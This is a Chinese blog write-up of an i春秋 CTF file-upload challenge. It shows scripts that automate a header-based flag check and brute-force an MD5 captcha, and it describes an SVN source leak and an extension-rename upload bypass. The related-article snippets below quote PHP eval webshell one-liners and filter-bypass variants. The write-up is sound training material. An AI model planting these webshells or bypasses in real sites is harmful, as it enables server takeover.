Web-Upload[i春秋][50pt]

最新推荐文章于 2023-05-08 19:11:38 发布
最新推荐文章于 2023-05-08 19:11:38 发布
阅读量1.3k 收藏
点赞数
分类专栏: CTF-Web 文章标签: CTF Wev
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Laurel_60/article/details/81435647
版权

去年写的,后面有点问题,懒得改了,要看就直接去翻我重写的另一篇吧2333
https://laure1.github.io/2019/08/29/Summary-of-Web/#Upload

打开链接–
Hi,CTFer!u should be a fast man:)
日常看源码,没啥有用滴信息。抓包,欸有点东西。
这里写图片描述
虽然看起来flag应该是base64编码的,当时我也懒得解了,反正和解密了再传结果一样的,会告诉你要fast,所以看了那一篇大佬写的wp,上脚本跑。

import base64,requests
def main():
    a = requests.session()
    b = a.get("http://406df0979135470a80c2423a4fc0383cba38e7fc29b044f6.game.ichunqiu.com/")
    key1 = b.headers["flag"]
    c = base64.b64decode(key1)
    d = str(c).split(':')
    key = base64.b64decode(d[1])
    body = {"ichunqiu":key}
    f = a.post("http://406df0979135470a80c2423a4fc0383cba38e7fc29b044f6.game.ichunqiu.com/",data=body)
    print (f.text)
if __name__ == '__main__':
    main()

跑出来之后给了一个路径- -
这里写图片描述
进去之后。emmmmm…
这里写图片描述
被这个卡哇伊的妹子萌到了。qaq- -
这里写图片描述
登陆界面除了username和password,还有就是这个验证码,根据提示,该验证码MD5加密后前六位是493495,所以放脚本跑- -

#coding:utf-8
import hashlib
def md5(s):
    return hashlib.md5(str(s).encode('utf-8')).hexdigest()
def main(s):
    for i in range(1,99999999):
        if md5(i)[0:6]  == str(s):
            print(i)
            exit(0)
if __name__ == '__main__':
    main("493495")

至于username嘛,大佬分析的是SVN源码泄漏漏洞,直接访问上一个地址+.svn/wc.db就可以看到- -
这里写图片描述
密码随便填,验证码跑个几分钟出来了,那就登进去看看咯- -
这里写图片描述
看到一个.php文件,走进去看看咯- - 这里写图片描述
文件上传欸,第一反应就是0x00截断。果断上传了一个图片,成功保存了,传来传去貌似没啥问题。最终,大佬轻松表示要改后缀名为.pnt --
改好后缀名之后,拿到了flag。
这里写图片描述
然而,提交之后居然是错误的,重新做了一遍拿到的结果也还是一样滴,无比绝望啊。是在下输了--这里写图片描述

我看得是一脸懵逼啊,这真的是50pt的题?听,心碎的声音2333

将至将至
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
暑期web10:基础的文件上传upload(i春秋)、上传绕过(实验吧)
qq_41618162的博客
08-18 2748
介于之前做了个包括文件上传步骤的题,突然想拿两个之前做过的文件上传题来回顾一下一些基础做法 首先是实验吧的上传绕过 首先我们上传最基础的一句话木马:<?php @eval($_POST['pass']);?> 反馈是‘不被允许的文件类型,仅支持上传jpg,gif,png后缀的文件’ 于是我把他的后缀改为.jpg再上传,又回显‘必须上传后缀名为php的文件才行’ 做成php...
i春秋WEBUpload
金 帛的博客
02-12 422
i春秋webWP
i春秋-Web(一)
qwzf
09-02 1350
前言 做了几道i春秋Web题,所以总结一下。 Web1:爆破-1 题目提示:某六位变量。查看题目,发现是代码审计 <?php include "flag.php"; $a = @$_REQUEST['hello'];//以get或post传入hello,并赋值给`$a` if(!preg_match('/^\w*$/',$a )){//正则表达式^匹配一行的开头,$表示结束。\w表示匹...
i春秋 Misc Web 爆破-1
Welcome To Myon'Blog !
05-08 1497
PHP常用函数,PHP超全局变量,正则匹配,正则表达式,代码审计
学习黑客知识无门?3个国内最大的黑客学习网站推荐给你
瓦罗兰特顶级C位的博客
05-04 930
国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际环境的实验平台,
webpack-upload-plugin:Webpack插件
05-13
环境要求节点> = 10.5.0安装npm i -D webpack-upload-plugin注意该插件不提供上传至CDN的服务。 实际上,它实际上取决于这种服务。 此插件适用于Webpack> = 3。 对于webpack @ 4,将optimization.minimize设置为...
aliyun-upload-sdk-1.5.0.zip
06-09
aliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-...
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
file-upload
02-01
在“jQuery-File-Upload-master”这个压缩包中,包含了jQuery File Upload的源代码、示例、文档和其他相关资源。开发者可以通过阅读源码了解其实现原理,通过示例快速上手,并参考文档解决在使用过程中遇到的问题。 ...
elemetUi 组件--el-upload实现上传Excel文件的实例
08-29
elemetUi 组件--el-upload 实现上传Excel文件的实例 elemetUi 组件的 el-upload 是一个功能强大且灵活的上传组件,通过它我们可以轻松地实现文件上传的功能。下面我们将详细介绍如何使用 elemetUi 组件的 el-...
upload(simple)
02-07
自己写的,感兴趣的可以下载看看,对初学者有用,可以起参考作用。
i春秋-web-upload(文件内容读取)(“百度杯”九月场)
Sea_Sand息禅
01-16 552
提示很明显,flag在flag.php中,所以,任务就是获取flag.php的内容。 方法一:一句话+菜刀(不再叙述) 方法二:上传脚本,使脚本拥有一定权限,再输出flag 先造一个php脚本 &lt;script language="PHP"&gt; echo((file_get_contents('flag.'.'p'.'h'.'p'))); &lt;/script&gt; ...
i春秋 upload
慢慢变小佬的博客
08-11 1782
 打开题目链接: 可以随意上传文件, 上传图片,txt文件,php文件等都能上传上去; 试着上传一句话; 当上传一句话木马时,上传成功后,原文件变成了如下: 把&lt;?和php过滤掉了,再上传另一个一句话;  &lt;script language="PHP"&gt;  @eval($_POST["code"]); &lt;/script&gt; 上传后连接菜刀;   ...
i春秋做题记录 web(一)
未完成的歌~的博客
11-03 1494
前言: 时间过的真快呀,一转眼半学期就过去了( ̄m ̄);攻防世界上的题差不多刷完了(剩下的都是不会的(T_T)),这周就来做做I春秋的题吧。 1、想怎么传就怎么传,就是这么任性。 2、出题人就告诉你这是个注入,有种别走! 3、这个真的是爆破。 4、没错!就是文件包含漏洞
i春秋web-Login(细心、注意)
Sea_Sand息禅
05-22 1297
上来就是让登陆,尝试登录页面报错,查看源码得到:<!-- test1 test1 -->,这可能就是登录的账号和密码,果然成功,进入了member.php,但是并没有得到什么有用的信息。 刷新登录后的界面,尝试抓包进行分析,在响应头处发现: 有个show=0,难道是用来显示什么信息的?在请求部分加上show: 1 试了好几个地方,只有show加在Referer前面的时候响应部分...
i春秋CTF训练 Web Upload
椰奶冻不安全的博客
06-21 1287
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1) 题目内容:想怎么传就怎么传,就是这么任性。 tips:flag在flag.php中 链接需到ichunqiu网站申请 访问网页得到文件上传输入框 明显是文件上传漏洞 方法一:上传木马 上传小马 <?pHp @eval($_POST['123']);?> 页面显示 @eval($_POST['123']);?> 把<?和php过滤了,可以用大小写绕过php的过
i春秋Web-Upload(第一届“百度杯”信息安全攻防总决赛 线上选拔赛)
Sea_Sand息禅
05-15 2136
查看源码: 告诉我们要上传一个ichunqiu的参数,但是貌似并没有找所谓的find,bp抓包看到响应中有flag的响应头: 但是解码之后上传得到的还是没上传一样的情况,响应头中的flag的内容改变了,网页也告诉我们be a fast man,所以就要写脚本了: import requests import base64 url = 'http://dc587a4fbff7497...
百度杯 Upload
qq_40273198的博客
04-26 488
访问赛题 URL, 返回包如下HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 28 Dec 2017 08:19:49 GMT Content-Type: text/html Content-Length: 87 Connection: keep-alive X-Powered-By: PHP/5.5.9-1ubuntu4.19 Set-Cookie...
i春秋Upload
weixin_30701575的博客
09-04 247
打开是一句普普通通的话,先查看源码,发现提示,我们需要post我们从i春秋得到的东西 得到了什么呢?不知道,去看看cookie,没什么特别的地方,再去抓包试试 找到了我们需要post的东西,不过这东西会一直刷新,并且频率很快,所以这里只能借助脚本 import base64,requests def main(): a = requests.sess...
web前端通过 el-upload 怎么上传MultipartFile
最新发布
05-23
el-upload 是一个基于 Element UI 的文件上传组件,它可以帮助我们方便地实现文件上传功能。下面是通过 el-upload 上传 MultipartFile 的步骤: 1. 首先需要在前端引入 Element UI 和 axios(或其他类似的 AJAX 库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值